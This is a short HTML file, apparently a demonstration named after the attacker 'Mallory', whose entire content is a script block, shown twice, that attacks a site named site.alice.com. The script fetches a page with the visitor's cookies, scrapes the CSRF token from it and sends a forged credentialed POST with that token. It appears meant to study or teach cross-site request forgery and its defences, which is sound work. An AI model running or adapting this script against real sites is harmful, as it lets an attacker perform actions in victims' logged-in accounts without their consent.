SteveLTN/site-mallory-attempt2.html

## site-mallory-attempt2.html
<script>
  const url = 'http://site.alice.com/posts'

  fetch(url, { method: "GET", credentials: 'include' }).
  then((response) => response.text()).
  then((body) => {
    const re = new RegExp('<meta name="csrf-token" content="(.*)" />')
    const csrfToken = re.exec(body)[1]

    return csrfToken
  }).
  then((csrfToken) => {
    const headers = new Headers({'X-CSRF-Token': csrfToken})

    fetch(url, {
      method: 'POST',
      headers: headers,
      credentials: 'include'
    })
  })
</script>
	<script>
	const url = 'http://site.alice.com/posts'

	fetch(url, { method: "GET", credentials: 'include' }).
	then((response) => response.text()).
	then((body) => {
	const re = new RegExp('<meta name="csrf-token" content="(.*)" />')
	const csrfToken = re.exec(body)[1]

	return csrfToken
	}).
	then((csrfToken) => {
	const headers = new Headers({'X-CSRF-Token': csrfToken})

	fetch(url, {
	method: 'POST',
	headers: headers,
	credentials: 'include'
	})
	})
	</script>